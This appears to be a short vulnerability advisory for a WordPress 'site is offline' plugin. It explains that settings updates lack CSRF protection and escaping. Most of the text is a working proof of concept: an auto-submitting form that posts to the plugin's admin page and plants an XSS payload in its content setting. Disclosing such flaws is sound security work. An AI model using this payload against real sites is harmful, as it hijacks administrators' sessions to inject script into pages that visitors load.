The plugin does not have CSRF check in place when updating its settings, and it also lacking sanitisation as well as escaping in some of them. As a result, attackers could make a logged in admin change them and put Cross-Site Scripting payloads in them via a CSRF attack
<form id="test" action="https://example.com/wp-admin/options-general.php?page=site-is-offline-plugin%2Fmain.php" method="POST">
<input type="text" name="cp_siteoffline_enabled" value="true">
<input type="text" name="cpso_save_settings" value="Änderungen speichern">
<input type="text" name="cp_siteoffline_content" value="<img src=x onerror=alert(/XSS/)>">
</form>
<script>
document.getElementById("test").submit();
</script>